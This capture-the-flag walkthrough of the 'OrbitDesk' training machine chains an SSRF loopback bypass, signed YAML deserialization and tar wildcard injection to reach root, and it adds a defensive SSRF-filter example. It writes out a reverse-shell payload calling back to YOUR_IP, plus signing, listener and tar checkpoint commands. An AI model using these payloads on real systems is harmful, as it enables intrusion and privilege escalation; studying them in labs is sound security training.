
OrbitDesk — Penetration Testing Walkthrough
Platform: HackidoLearn
Machine Information
| Field | Details |
| --- | --- |
| Machine | OrbitDesk |
| Category | Web Exploitation |
| Difficulty | Easy–Medium |
| Initial Access | SSRF + YAML Deserialization |
| User Access | deploy |
| Privilege Escalation | GNU Tar Wildcard Injection |
1. Reconnaissance
Started with a full port scan to identify exposed services.
nmap -sC -sV -p- TARGET
Result:
22/tcp open ssh
8080/tcp open http
The web application was hosted on port 8080.
2. Web Enumeration
Browsing to http://TARGET:8080 revealed the OrbitDesk Support Operations Console.
Interesting HTML found in source:
<form action="/api/proxy/preview" method="get">
<input id="url" name="url" type="url">
</form>
This suggested potential SSRF functionality.
3. SSRF Discovery
Testing the preview endpoint with an external URL confirmed the server fetches remote content:
curl "http://TARGET:8080/api/proxy/preview?url=https://example.com"
Attempting loopback was blocked:
curl "http://TARGET:8080/api/proxy/preview?url=http://127.0.0.1"
Response:
Target not allowed
Page note: “Loopback control plane remains restricted to the host.”
This hinted that useful internal services existed.
4. SSRF Bypass
The filter blocked 127.0.0.1 but not the shorthand 127.1. Used it to hit an internal debug API on port 9090:
curl "http://TARGET:8080/api/proxy/preview?url=http://127.1:9090/debug/config?scope=sync"
Leaked config:
{
"deploy_key_hint": "/var/backups/orbitdesk/deploy_sync_ed25519",
"environment": "production",
"import_signing_key": "d4c2b4d1b3e6402f9cfbbad4b45ce0d14bd6f40148fd8ac79a89a52a7c5d9f0a",
"sync_profile": "signed-yaml-import"
}
Critical findings:
- HMAC import signing key leaked
- SSH private key path disclosed
- Internal configuration exposed
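Why a filter that blocks 127.0.0.1 still lets 127.1 through, and a check that closes the gap, as an added example that is not OrbitDesk's own code. The blocklist shape, the function names and the sample URLs are assumptions; the page shows only the filter's behaviour.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumed shape of the weak filter: a literal-string blocklist.
# The page shows only its behaviour (127.0.0.1 blocked, 127.1 allowed).
BLOCKED_HOSTS = {"127.0.0.1", "localhost", "::1"}

def naive_is_allowed(url):
    return (urlsplit(url).hostname or "").lower() not in BLOCKED_HOSTS

def canonical_ip(host):
    """Return the address a socket would connect to for a numeric host, else None."""
    try:
        # inet_aton accepts the legacy IPv4 spellings: 127.1, 2130706433, 0x7f.1
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except (OSError, ValueError):
        pass
    try:
        return ipaddress.IPv6Address(host)
    except ValueError:
        return None

def resolve_all(host):
    """Default resolver: every address DNS returns for the name."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]

def hardened_is_allowed(url, resolver=resolve_all):
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    ip = canonical_ip(parts.hostname)
    try:
        addrs = [ip] if ip is not None else [canonical_ip(a) for a in resolver(parts.hostname)]
    except OSError:
        return False
    # Every candidate must be publicly routable; loopback, RFC 1918,
    # link-local and unparseable addresses are all refused.
    return bool(addrs) and all(a is not None and a.is_global for a in addrs)

# Constructed sample inputs; the first two mirror the requests on this page.
SAMPLES = ["http://127.0.0.1", "http://127.1:9090/debug/config?scope=sync",
           "http://2130706433/", "http://[::1]:9090/"]

if __name__ == "__main__":
    for u in SAMPLES:
        print(f"{u:45} naive={naive_is_allowed(u)} hardened={hardened_is_allowed(u)}")
```

The check only holds if the fetcher connects to the address that was validated rather than resolving the name a second time, and if every redirect target goes through the same check.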
5. YAML Deserialization RCE
The internal config revealed a signed YAML import system using yaml.load() — vulnerable to deserialization attacks.
5.1 Malicious YAML Payload
!!python/object/apply:os.system
- "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
5.2 Generate HMAC Signature
KEY='d4c2b4d1b3e6402f9cfbbad4b45ce0d14bd6f40148fd8ac79a89a52a7c5d9f0a'
SIG=$(openssl dgst -sha256 -hmac "$KEY" payload.yml | awk '{print $2}')
5.3 Trigger Signed Import
curl -X POST http://TARGET:8080/api/config/import \
-H "X-Import-Signature: $SIG" \
--data-binary @payload.yml
Response:
{ "message": "configuration import queued for sync", "status": "accepted" }
Reverse shell connected back to the listener.
6. Initial Foothold
nc -lvnp 4444
Shell obtained:
web@container:/opt/orbitdesk$
Upgraded to interactive shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
7. Credential Access
SSRF response leaked the SSH key path. Retrieved and saved locally:
cat /var/backups/orbitdesk/deploy_sync_ed25519
chmod 600 deploy_sync_ed25519
8. Lateral Movement
ssh -i deploy_sync_ed25519 -p 2222 deploy@TARGET
Successful login as deploy user.
9. User Flag
cat ~/user.txt
🚩 HackCTF{orbitdesk_lateral_sync_key}
10. Privilege Escalation
Checked sudo permissions:
sudo -l
Output:
(root) NOPASSWD: /usr/local/bin/orbit-backup
11. GNU Tar Wildcard Injection
Moved to the backup target directory and crafted the exploit:
cd /srv/orbitdesk/exports/reports
cat > shell.sh << 'EOF'
#!/bin/bash
cp /root/root.txt /tmp/root.txt
chmod 644 /tmp/root.txt
EOF
chmod +x shell.sh
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'
Triggered the backup with sudo:
sudo /usr/local/bin/orbit-backup /srv/orbitdesk/exports/reports /tmp/reports.tgz
GNU tar interpreted the malicious filenames as CLI options and executed shell.sh as root.
12. Root Flag
cat /tmp/root.txt
🚩 HackCTF{tar_checkpoint_root_pipeline}
13. Attack Path Summary
Web App
→ SSRF (/api/proxy/preview)
→ 127.1 Loopback Bypass
→ Internal Debug API
→ Leaked HMAC Key + SSH Key Path
→ Signed YAML Import
→ Unsafe yaml.load() → RCE as web
→ SSH Key Retrieved
→ SSH Lateral Movement (deploy)
→ sudo orbit-backup
→ GNU Tar Wildcard Injection
→ ROOT
14. Conclusion
OrbitDesk demonstrates how individually moderate vulnerabilities chain into full system compromise:
- SSRF — Allowed access to internal services via 127.1 loopback bypass
- Internal Service Exposure — Debug API leaked HMAC key and SSH key path
- Unsafe YAML Deserialization — yaml.load() enabled arbitrary code execution
- SSH Credential Reuse — Disclosed private key enabled lateral movement
- GNU Tar Wildcard Injection — Sudo backup script escalated to root
Combining these weaknesses resulted in complete system compromise from unauthenticated web access to root privileges.